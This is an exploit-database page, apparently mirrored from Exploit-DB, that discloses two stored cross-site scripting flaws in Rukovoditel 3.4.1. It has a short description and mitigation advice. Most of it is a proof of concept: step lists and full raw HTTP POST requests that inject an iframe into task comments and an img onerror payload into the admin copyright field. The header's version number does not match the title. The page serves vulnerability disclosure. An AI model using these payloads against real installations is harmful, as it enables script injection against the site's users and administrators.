header-logo
Suggest Exploit
vendor:
Rukovoditel
by:
Mirabbas Agalarov
7.5
CVSS
HIGH
Multiple Stored XSS
79
CWE
Product Name: Rukovoditel
Affected Version From: 3.4.2001
Affected Version To: 3.4.2001
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux
2023

Rukovoditel 3.4.1 – Multiple Stored XSS

The Rukovoditel version 3.4.1 is vulnerable to multiple stored cross-site scripting (XSS) attacks. The first XSS vulnerability can be exploited by an authenticated attacker by adding a malicious comment containing an iframe tag with a src attribute pointing to a malicious website. The second XSS vulnerability can be exploited by an authenticated administrator by setting the Copyright Text to a value containing a malicious img tag with an onerror attribute triggering an alert.

Mitigation:

To mitigate the vulnerabilities, users are advised to update to a patched version of Rukovoditel. Additionally, input validation and output encoding should be implemented to prevent XSS attacks.
Source

Exploit-DB raw data:

Exploit Title: Rukovoditel 3.4.1 - Multiple Stored XSS
Version: 3.4.1
Bugs:  Multiple Stored XSS
Technology: PHP
Vendor URL: https://www.rukovoditel.net/
Software Link: https://www.rukovoditel.net/download.php
Date of found: 24-06-2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
               ###XSS-1###
========================================
steps:
1. login to account
2. create project (http://localhost/index.php?module=items/items&path=21)
3. add task      
4. open task 
5. add comment as "<iframe src="https://14.rs"></iframe> "


POST /index.php?module=items/comments&action=save&token=FEOZ9jeKuA HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 241
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?module=items/info&path=21-2/22-1&redirect_to=subentity&gotopage[74]=1
Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

form_session_token=FEOZ9jeKuA&path=21-2%2F22-1&fields%5B169%5D=47&fields%5B170%5D=53&fields%5B174%5D=3&description=%3Ciframe+src%3D%22https%3A%2F%2F14.rs%22%3E%3C%2Fiframe%3E+&uploadifive_attachments_upload_attachments=&comments_attachments=

===========================
               ###XSS-2###
===========================
1.go to admin account
2.go to configration => applicaton
3.Copyright Text set as "<img src=x onerror=alert(1)>"


POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------12298384558648010343132232769
Content-Length: 2766
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?module=configuration/application
Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="form_session_token"

ju271AAoy1
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_NAME]"

Rukovoditel
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SHORT_NAME_MOBILE]"

ffgsdfgsdfg
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]"

ruko
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="APP_LOGO"; filename=""
Content-Type: application/octet-stream


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LOGO]"


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LOGO_URL]"


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="APP_FAVICON"; filename=""
Content-Type: application/octet-stream


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_FAVICON]"


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]"

<img src=x onerror=alert(1)>
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LANGUAGE]"

english.php
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SKIN]"


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_TIMEZONE]"

America/New_York
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]"

10
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]"

m/d/Y
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]"

m/d/Y H:i
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]"

2/./*
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]"

0
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]"

0
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]"

0
-----------------------------12298384558648010343132232769--

Navigation

Suggest Exploit

Services By CQR